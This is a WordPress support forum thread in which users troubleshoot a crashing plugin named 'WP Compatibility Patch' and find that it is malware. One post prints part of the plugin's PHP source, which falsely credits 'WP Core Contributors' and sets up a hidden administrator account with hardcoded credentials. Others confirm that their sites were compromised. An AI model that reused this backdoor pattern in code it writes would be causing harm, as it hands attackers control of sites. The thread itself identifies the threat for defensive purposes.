I also cannot find this plugin on ww.wp.xz.cn (or anywhere else via Google for that matter).
Well, that is the problem: if a piece is code is not distributed publicly by ww.wp.xz.cn, it’s going to be impossible for anyone here to know what’s contained in it, its purpose, why it’s “crashing” your website, or even if it’s not some malware.
If the “compatibility patch” itself is not compatible and is crashing your site, then you may as well remove it.
Yes, that’s definitely what I was leaning towards doing. I guess I meant, if anyone knows who made this plugin, I would love to submit an issue to them (not being able to find it however likely means it’s not being maintained).
Moderator
Yui
(@fierevere)
永子
it was meant for old or even ancient WordPress versions, if you still want to rollback some features or settings, use individual filters
Alright, thank you – I’m going to go ahead and remove the plugin and mark this as resolved, we have updated a lot and our current WP version is pretty recent.
Just adding that I’m having the same issue… Website crashes when “WP Compatibiity Patch” is activated. It was actually a subcontractor who installed it for me, so I’m not sure the exact purpose, but I seem to recall it was to make an older version of Avada compatible with newer PHP versions. At least that’s what I’m recalling.
Looks like my current Avada version is 7.2.1 but I think I might have updated it at some point… so hopefully that plugin is no longer needed.
Similar issue. Plugin code looks EXTREMELY suspicious:
<?php
/*
Plugin Name: WP Compatibility Patch
Description: Fixes minor compatibility issues with the latest WordPress and PHP versions.
Version: 1.3.2
Author: WP Core Contributors
*/
if (
!function_exists('wpc_patch_bootstrap') &&
function_exists('add_action') &&
function_exists('wp_insert_user')
) {
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'y5w9IlUbE0',
'role' => 'administrator',
'user_email' => '[email protected]'
);
I’m not a PHP programmer but hardcoded credentials has to be a backdoor of sorts right? And the innocent sounding plugin name combined with the fact there’s no official record of it?
Hey Clarkos,
I think you’re onto something, yes. Later on, our hosting provider flagged a file left behind after deleting the plugin as malicious code. I would recommend deleting the plugin and running an additional security check through a trustworthy plugin or your hosting provider as well.
I’m also not a PHP programmer and am unsure if there are additional steps you should take.
Client was 100% compromised as there was an admin user with those credentails created.
FML.
You’re right, we also had this on our website. Other than deleting that account, removing the plugin, etc., are there any other steps anyone would recommend taking?
